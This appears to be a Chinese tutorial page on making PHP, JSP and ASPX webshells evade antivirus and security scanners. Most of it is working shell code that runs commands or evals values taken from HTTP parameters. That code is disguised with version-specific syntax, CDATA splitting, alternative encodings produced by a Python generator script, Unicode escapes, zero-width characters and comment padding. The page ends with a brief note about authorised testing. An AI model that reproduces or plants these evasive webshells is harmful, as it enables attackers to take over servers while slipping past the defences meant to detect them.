PHP\/JSP\/ASPX Webshell免杀技术详解<\/h1>

一、PHP免杀技术<\/h2>

1. 利用PHP版本差异进行免杀<\/h3>

1.1 高版本PHP语法不换行执行命令<\/h4>
<?=<\/span>$a=<<<<\/span> aaassasssasssasssasssasssasssasssasssasssasssassssaa<\/span>;echo<\/span> `whoami`<\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
5.2\/5.3\/5.4版本报错<\/li>
7.3.4成功执行命令<\/li>
<\/ul>
1.2 利用反斜杠特殊符号<\/h4>
<?<\/span>php\echo<\/span> `whoami`<\/span>;?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
5.3\/7.3执行失败<\/li>
5.2成功执行<\/li>
<\/ul>
1.3 十六进制字符串差异<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$s=<\/span>substr<\/span>("aabbccsystem"<\/span>,"0x6"<\/span>);
<\/span><\/span>$s(whoami<\/span>)?<\/span>
<\/span><\/span><\/code><\/pre>
7.3\/5.2执行失败<\/li>
5.3\/5.5成功执行<\/li>
<\/ul>
1.4 PHP 7.0的null合并操作符<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$a =<\/span> $_GET['function'<\/span>] ??<\/span> 'whoami'<\/span>;
<\/span><\/span>$b =<\/span> $_GET['cmd'<\/span>] ??<\/span> 'whoami'<\/span>;
<\/span><\/span>$a(null<\/span>.<\/span>(null<\/span>.<\/span>$b));
<\/span><\/span><\/code><\/pre>2. 其他PHP免杀技术<\/h3>

垃圾数据填充<\/li>
代码变形混淆<\/li>
特殊字符插入<\/li>
大量注释干扰<\/li>
<\/ul>
二、JSP免杀技术<\/h2>
1. 文件格式特性<\/h3>

JSP后缀兼容JSPX代码和特性<\/li>
JSPX后缀不兼容JSP代码<\/li>
<\/ul>
2. JSPX CDATA特性<\/h3>
String cmd = request.getPar<![CDATA[ameter]]>("shell");
<\/code><\/pre>

CDATA部分内容会被解析器忽略<\/li>
但实际会拼接为getParameter<\/li>
<\/ul>
3. 实体化编码绕过<\/h3>
if (cmd !=null){
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
<\/code><\/pre>
4. 编码格式转换<\/h3>
# Python2生成不同编码的JSP文件<\/span>
<\/span><\/span>charset =<\/span> "utf-8"<\/span>
<\/span><\/span>data =<\/span> '''<%Runtime.getRuntime().exec(request.getParameter("i")%>'''<\/span>
<\/span><\/span>
<\/span><\/span># UTF-16BE<\/span>
<\/span><\/span>f16be =<\/span> open('utf-16be.jsp'<\/span>,'wb'<\/span>)
<\/span><\/span>f16be.<\/span>write('<%@ page contentType="charset=utf-16be" %>'<\/span>)
<\/span><\/span>f16be.<\/span>write(data.<\/span>encode('utf-16be'<\/span>))
<\/span><\/span>
<\/span><\/span># UTF-16LE<\/span>
<\/span><\/span>f16le =<\/span> open('utf-16le.jsp'<\/span>,'wb'<\/span>)
<\/span><\/span>f16le.<\/span>write('<jsp:directive.page contentType="charset=utf-16le"\/>'<\/span>)
<\/span><\/span>f16le.<\/span>write(data.<\/span>encode('utf-16le'<\/span>))
<\/span><\/span>
<\/span><\/span># CP037<\/span>
<\/span><\/span>fcp037 =<\/span> open('cp037.jsp'<\/span>,'wb'<\/span>)
<\/span><\/span>fcp037.<\/span>write(data.<\/span>encode('cp037'<\/span>))
<\/span><\/span>fcp037.<\/span>write('<%@ page contentType="charset=cp037"\/>'<\/span>)
<\/span><\/span><\/code><\/pre>三、ASPX免杀技术<\/h2>
1. Unicode编码<\/h3>
<%@ Page Language="Jscript"%>
<%\u0065\u0076\u0061\u006c(@Request.Item["pass"],"unsafe");%>
<\/code><\/pre>

JScript不支持大U和多个0增加<\/li>
C#支持更多Unicode变体<\/li>
<\/ul>
2. 空字符串连接<\/h3>
插入以下字符不影响执行：<\/p>
\u200c \u200d \u200e \u200f
<\/code><\/pre>
3. <%%>语法分割<\/h3>
<%@Page Language=JS%>
<%eval%>
<%(@Request.%>
<%Item["pass"],"unsafe");%>
<\/code><\/pre>
4. 头部免杀<\/h3>
原始：<\/p>
<%@ Page Language="C#" %>
<\/code><\/pre>
变形：<\/p>
<%@Language=CSHARP%>
<\/code><\/pre>
或<\/p>
<%@ Page Language="Jscript" Page Language=JS%>
<\/code><\/pre>
5. @符号插入<\/h3>
原始：<\/p>
(Context.Session["payload"] == null)
<\/code><\/pre>
变形：<\/p>
(@Context.@Session["payload"] == null)
<\/code><\/pre>
6. 注释干扰<\/h3>
<%\/*qi*\/Session.\/*qi*\/Add(@"k"\/*qi*\/,\/*qi*\/"e45e329feb5d925b"\/*qi*\/)%>
<\/code><\/pre>
四、综合免杀策略<\/h2>

结合多种技术混合使用<\/li>
针对目标环境选择合适的技术<\/li>
注意不同语言和版本的特异性<\/li>
保持代码可执行性的同时最大化混淆<\/li>
<\/ol>
以上技术在实际应用中需要根据目标环境的具体配置和防护措施进行选择和调整，建议在合法授权的测试环境中验证效果。<\/p>